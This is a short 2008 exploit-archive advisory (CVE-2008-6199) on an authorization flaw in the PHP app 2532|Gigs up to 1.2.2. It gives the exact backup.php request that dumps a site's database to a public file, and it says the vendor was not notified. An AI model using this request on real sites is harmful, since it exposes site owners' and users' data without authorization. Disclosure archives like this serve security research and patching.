2532/Gigs <= 1.2.2 - Arbitrary Database Backup/Download Vulnerability

2008-04-18T00:00:00
ID EDB-ID:5465
Type exploitdb
Reporter t0pP8uZz
Modified 2008-04-18T00:00:00

Description

2532|Gigs. CVE-2008-6199. Webapps exploit for php platform

                                        
                                            --==+================================================================================+==--
--==+          2532|Gigs <= 1.2.2 Arbitrary Remote Database Backup/Download          +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz
Discovered On: 18 April 2008
Script Download: http://www.2532gigs.com/?download=2532Gigs_stable
DORK: N/A

Vendor Has Not Been Notified!


DESCRIPTION: 
2532|Gigs does not validate a user in "backup.php" this means any user can visit and backup.
of course some GET variables are being used but thats all.

running the below url/path on a server that is running 2532|Gigs will make a backup of the database
and save it too "http://site.com/2532gigs/backup.sql"


Vulnerability:
http://site.com/2532gigs/backup.php?export=1


NOTE/TIP: 
you must be logged in to a ordinary user account for this too work!


GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !



--==+================================================================================+==--
--==+          2532|Gigs <= 1.2.2 Arbitrary Remote Database Backup/Download          +==--
--==+================================================================================+==--

# milw0rm.com [2008-04-18]